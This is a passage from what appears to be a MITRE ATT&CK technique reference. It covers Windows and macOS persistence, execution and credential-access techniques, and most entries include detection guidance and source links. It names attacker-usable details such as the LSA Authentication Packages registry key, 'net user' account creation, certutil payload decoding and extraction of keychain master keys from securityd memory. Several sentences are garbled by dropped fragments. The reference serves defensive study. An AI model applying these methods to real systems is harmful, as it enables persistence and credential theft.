<p>Likewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed.[[Citation: McAfee CHIPSEC Blog]][[Citation: Github CHIPSEC]][[Citation: Intel HackingTeam UEFI Rootkit]]</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: API monitoring, BIOS, EFI</p>
</div>
<div class="paragraph">
<p>Contributors: Ryan Becwar</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 581. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1019">https://attack.mitre.org/wiki/Technique/T1019</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Unified%20Extensible%20Firmware%20Interface">https://en.wikipedia.org/wiki/Unified%20Extensible%20Firmware%20Interface</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html">http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.uefi.org/about">http://www.uefi.org/about</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research">http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/copernicus-question-your-assumptions-about">http://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/copernicus-question-your-assumptions-about</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/BIOS">https://en.wikipedia.org/wiki/BIOS</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/chipsec/chipsec">https://github.com/chipsec/chipsec</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/">https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_registry_run_keys_start_folder"><a class="anchor" href="#_registry_run_keys_start_folder"></a><a class="link" href="#_registry_run_keys_start_folder">Registry Run Keys / Start Folder</a></h3>
<div class="paragraph">
<p>Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.Masquerading to make the Registry entries look as if they are associated with legitimate programs.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders.[[Citation: TechNet Autoruns]] Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.</p>
</div>
<div class="paragraph">
<p>Changes to these locations typically happen under normal conditions when legitimate software is installed. To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for [[Command and Control]], learning details about the environment through <a id="Discovery"></a>, and [[Lateral Movement]].</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: Windows Registry, File monitoring</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 582. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1060">https://attack.mitre.org/wiki/Technique/T1060</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/sysinternals/bb963902">https://technet.microsoft.com/en-us/sysinternals/bb963902</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://msdn.microsoft.com/en-us/library/aa376977">http://msdn.microsoft.com/en-us/library/aa376977</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_service_execution"><a class="anchor" href="#_service_execution"></a><a class="link" href="#_service_execution">Service Execution</a></h3>
<div class="paragraph">
<p>Adversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. This can be done by either creating a new service or modifying an existing service. This technique is the execution used in conjunction with New Service and Modify Existing Service during service persistence or privilege escalation.</p>
</div>
<div class="paragraph">
<p>Detection: Changes to service Registry entries and command-line invocation of tools capable of modifying services that do not correlate with known software, patch cycles, etc., may be suspicious. If a service is used only to execute a binary or script and not to persist, then it will likely be changed back to its original form shortly after the service is restarted so the service is not left broken, as is the case with the common administrator tool PsExec.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: Windows Registry, Process monitoring, Process command-line parameters</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 583. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1035">https://attack.mitre.org/wiki/Technique/T1035</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_uncommonly_used_port"><a class="anchor" href="#_uncommonly_used_port"></a><a class="link" href="#_uncommonly_used_port">Uncommonly Used Port</a></h3>
<div class="paragraph">
<p>Adversaries may conduct C2 communications over a non-standard port to bypass proxies and firewalls that have been improperly configured.</p>
</div>
<div class="paragraph">
<p>Detection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.[[Citation: University of Birmingham C2]]</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Linux, Windows 10, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: Netflow/Enclave netflow, Process use of network, Process monitoring</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 584. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1065">https://attack.mitre.org/wiki/Technique/T1065</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf">https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_deobfuscate_decode_files_or_information"><a class="anchor" href="#_deobfuscate_decode_files_or_information"></a><a class="link" href="#_deobfuscate_decode_files_or_information">Deobfuscate/Decode Files or Information</a></h3>
<div class="paragraph">
<p>Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware, Scripting, PowerShell, or by using utilities present on the system.</p>
</div>
<div class="paragraph">
<p>One such example is use of certutil to decode a remote access tool portable executable file that has been hidden inside a certificate file.certutil.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process Monitoring, Process command-line parameters</p>
</div>
<div class="paragraph">
<p>Contributors: Matthew Demaske, Adaptforward</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 585. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1140">https://attack.mitre.org/wiki/Technique/T1140</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.malwarebytes.com/cybercrime/social-engineering-cybercrime/2017/03/new-targeted-attack-saudi-arabia-government/">https://blog.malwarebytes.com/cybercrime/social-engineering-cybercrime/2017/03/new-targeted-attack-saudi-arabia-government/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_create_account"><a class="anchor" href="#_create_account"></a><a class="link" href="#_create_account">Create Account</a></h3>
<div class="paragraph">
<p>Adversaries with a sufficient level of access may create a local system or domain account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.</p>
</div>
<div class="paragraph">
<p>The &lt;code&gt;net user&lt;/code&gt; commands can be used to create a local or domain account.</p>
</div>
<div class="paragraph">
<p>Detection: Collect data on account creation within a network. Event ID 4720 is generated when a user account is created on a Windows system and domain controller.[[Citation: Microsoft User Creation Event]] Perform regular audits of domain and local system accounts to detect suspicious accounts that may have been created by an adversary.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows 10, Windows Server 2012, Windows 7, Windows 8, Windows Server 2008 R2, Windows Server 2012 R2, Windows 8.1, Windows Server 2003, Windows Server 2008, Windows XP, Windows Server 2003 R2, Windows Vista, Linux, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: Process Monitoring, Process command-line parameters, Authentication logs, Windows event logs</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 586. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1136">https://attack.mitre.org/wiki/Technique/T1136</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://docs.microsoft.com/windows/device-security/auditing/event-4720">https://docs.microsoft.com/windows/device-security/auditing/event-4720</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_data_staged"><a class="anchor" href="#_data_staged"></a><a class="link" href="#_data_staged">Data Staged</a></h3>
<div class="paragraph">
<p>Collected data is staged in a central location or directory prior to Data Compressed or Data Encrypted.</p>
</div>
<div class="paragraph">
<p>Interactive command shells may be used, and common functionality within cmd and bash may be used to copy data into a staging location.</p>
</div>
<div class="paragraph">
<p>Detection: Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files.</p>
</div>
<div class="paragraph">
<p>Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as Windows Management Instrumentation and PowerShell.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10, Linux, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process monitoring, Process command-line parameters</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 587. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1074">https://attack.mitre.org/wiki/Technique/T1074</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_rc_common"><a class="anchor" href="#_rc_common"></a><a class="link" href="#_rc_common">Rc.common</a></h3>
<div class="paragraph">
<p>During the boot process, macOS and Linux both execute &lt;code&gt;source /etc/rc.common&lt;/code&gt;, which is a shell script containing various utility functions. This file also defines routines for processing command-line arguments and for gathering system settings, and is thus recommended to include in the start of Startup Item Scripts[[Citation: Startup Items]]. In macOS and OS X, this is now a deprecated technique in favor of launch agents and launch daemons, but is currently still used.</p>
</div>
<div class="paragraph">
<p>Adversaries can use the rc.common file as a way to hide code for persistence that will execute on each reboot as the root user[[Citation: Methods of Mac Malware Persistence]].</p>
</div>
<div class="paragraph">
<p>Detection: The &lt;code&gt;/etc/rc.common&lt;/code&gt; file can be monitored to detect changes from the company policy. Monitor process execution resulting from the rc.common script for unusual or unknown applications or behavior.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process Monitoring</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 588. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1163">https://attack.mitre.org/wiki/Technique/T1163</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html">https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf">https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_securityd_memory"><a class="anchor" href="#_securityd_memory"></a><a class="link" href="#_securityd_memory">Securityd Memory</a></h3>
<div class="paragraph">
<p>In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apples keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords.[[Citation: OS X Keychain]][[Citation: External to DA, the OS X Way]] Apples securityd utility takes the users logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the users password, but once the master key is found, an attacker need only iterate over the other values to unlock the final password.[[Citation: OS X Keychain]]</p>
</div>
<div class="paragraph">
<p>If an adversary can obtain root access (allowing them to read securityds memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the users logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc.[[Citation: OS X Keychain]][[Citation: OSX Keydnap malware]]</p>
</div>
<div class="paragraph">
<p>Platforms: OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: Process Monitoring</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 589. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1167">https://attack.mitre.org/wiki/Technique/T1167</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/">https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way">http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://juusosalonen.com/post/30923743427/breaking-into-the-os-x-keychain">http://juusosalonen.com/post/30923743427/breaking-into-the-os-x-keychain</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_new_service"><a class="anchor" href="#_new_service"></a><a class="link" href="#_new_service">New Service</a></h3>
<div class="paragraph">
<p>When operating systems boot up, they can start programs or applications called services that perform background system functions.Masquerading. Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through Service Execution.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor service creation through changes in the Registry and common utilities using command-line invocation. New, benign services may be created during installation of new software. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: Windows Registry, Process monitoring, Process command-line parameters</p>
</div>
<div class="paragraph">
<p>Effective Permissions: SYSTEM</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 590. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1050">https://attack.mitre.org/wiki/Technique/T1050</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/sysinternals/bb963902">https://technet.microsoft.com/en-us/sysinternals/bb963902</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/cc772408.aspx">https://technet.microsoft.com/en-us/library/cc772408.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_network_share_connection_removal"><a class="anchor" href="#_network_share_connection_removal"></a><a class="link" href="#_network_share_connection_removal">Network Share Connection Removal</a></h3>
<div class="paragraph">
<p>Windows shared drive and Windows Admin Shares connections can be removed when no longer needed. Net is an example utility that can be used to remove network share connections with the &lt;code&gt;net use \\system\share /delete&lt;/code&gt; command.Windows Admin Shares. SMB traffic between systems may also be captured and decoded to look for related network share session and file transfer activity. Windows authentication logs are also useful in determining when authenticated network shares are established and by which account, and can be used to correlate network share activity to other events to investigate potentially malicious activity.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: Process monitoring, Process command-line parameters, Packet capture, Authentication logs</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 591. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1126">https://attack.mitre.org/wiki/Technique/T1126</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/bb490717.aspx">https://technet.microsoft.com/bb490717.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dll_injection"><a class="anchor" href="#_dll_injection"></a><a class="link" href="#_dll_injection">DLL Injection</a></h3>
<div class="paragraph">
<p>DLL injection is used to run code in the context of another process by causing the other process to load and execute code. Running code in the context of another process provides adversaries many benefits, such as access to the process&#8217;s memory and permissions. It also allows adversaries to mask their actions under a legitimate process. A more sophisticated kind of DLL injection, reflective DLL injection, loads code without calling the normal Windows API calls, potentially bypassing DLL load monitoring. Numerous methods of DLL injection exist on Windows, including modifying the Registry, creating remote threads, Windows hooking APIs, and DLL pre-loading.PowerShell with tools such as PowerSploit,[[Citation: Powersploit]] so additional PowerShell monitoring may be required to cover known implementations of this behavior.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: API monitoring, Windows Registry, File monitoring, Process monitoring</p>
</div>
<div class="paragraph">
<p>Effective Permissions: User, Administrator, SYSTEM</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 592. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1055">https://attack.mitre.org/wiki/Technique/T1055</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.codeproject.com/Articles/4610/Three-Ways-to-Inject-Your-Code-into-Another-Proces">http://www.codeproject.com/Articles/4610/Three-Ways-to-Inject-Your-Code-into-Another-Proces</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://en.wikipedia.org/wiki/DLL%20injection">http://en.wikipedia.org/wiki/DLL%20injection</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/mattifestation/PowerSploit">https://github.com/mattifestation/PowerSploit</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hidden_files_and_directories"><a class="anchor" href="#_hidden_files_and_directories"></a><a class="link" href="#_hidden_files_and_directories">Hidden Files and Directories</a></h3>
<div class="paragraph">
<p>To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a hidden file. These files dont show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (&lt;code&gt;dir /a&lt;/code&gt; for Windows and &lt;code&gt;ls a&lt;/code&gt; for Linux and macOS).</p>
</div>
<div class="paragraph">
<p>===Windows===</p>
</div>
<div class="paragraph">
<p>Users can mark specific files as hidden by using the attrib.exe binary. Simply do &lt;code&gt;attrib +h filename&lt;/code&gt; to mark a file or folder as hidden. Similarly, the “+s” marks a file as a system file and the “+r” flag marks the file as read only. Like most windows binaries, the attrib.exe binary provides the ability to apply these changes recursively “/S”.</p>
</div>
<div class="paragraph">
<p>===Linux/Mac===</p>
</div>
<div class="paragraph">
<p>Users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name [[Citation: Sofacy Komplex Trojan]][[Citation: Antiquated Mac Malware]]. Files and folder that start with a period, ., are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable. For command line usages, there is typically a flag to see all files (including hidden ones). To view these files in the Finder Application, the following command must be executed: &lt;code&gt;defaults write com.apple.finder AppleShowAllFiles YES&lt;/code&gt;, and then relaunch the Finder Application.</p>
</div>
<div class="paragraph">
<p>===Mac===</p>
</div>
<div class="paragraph">
<p>Files on macOS can be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app[[Citation: WireLurker]].
Many applications create these hidden files and folders to store information so that it doesnt clutter up the users workspace. For example, SSH utilities create a .ssh folder thats hidden and contains the users known hosts and keys.</p>
</div>
<div class="paragraph">
<p>Adversaries can use this to their advantage to hide files and folders anywhere on the system for persistence and evading a typical user or system analysis that does not incorporate investigation of hidden files.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor the file system and shell commands for files being created with a leading "." and the Windows command-line use of attrib.exe to add the hidden attribute.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Linux, Windows 10, MacOS, OS X</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process Monitoring, Process command-line parameters</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 593. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1158">https://attack.mitre.org/wiki/Technique/T1158</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.paloaltonetworks.com/content/dam/pan/en%20US/assets/pdf/reports/Unit%2042/unit42-wirelurker.pdf">https://www.paloaltonetworks.com/content/dam/pan/en%20US/assets/pdf/reports/Unit%2042/unit42-wirelurker.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/">https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/">https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_authentication_package"><a class="anchor" href="#_authentication_package"></a><a class="link" href="#_authentication_package">Authentication Package</a></h3>
<div class="paragraph">
<p>Windows Authentication Package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.[[Citation: MSDN Authentication Packages]]</p>
</div>
<div class="paragraph">
<p>Adversaries can use the autostart mechanism provided by LSA Authentication Packages for persistence by placing a reference to a binary in the Windows Registry location &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\&lt;/code&gt; with the key value of &lt;code&gt;"Authentication Packages"=&lt;target binary&gt;&lt;/code&gt;. The binary will then be executed by the system when the authentication packages are loaded.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor the Registry for changes to the LSA Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned DLLs try to load into the LSA by setting the Registry key &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe&lt;/code&gt; with AuditLevel = 8.[[Citation: Graeber 2014]][[Citation: Microsoft Configure LSA]]</p>
</div>
<div class="paragraph">
<p>Platforms: Windows Server 2003, Windows Server 2008, Windows Server 2012, Windows XP, Windows 7, Windows 8, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012 R2, Windows Vista, Windows 8.1, Windows 10</p>
</div>
<div class="paragraph">
<p>Data Sources: DLL monitoring, Windows Registry, Loaded DLLs</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 594. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1131">https://attack.mitre.org/wiki/Technique/T1131</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx">https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/dn408187.aspx">https://technet.microsoft.com/en-us/library/dn408187.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html">http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
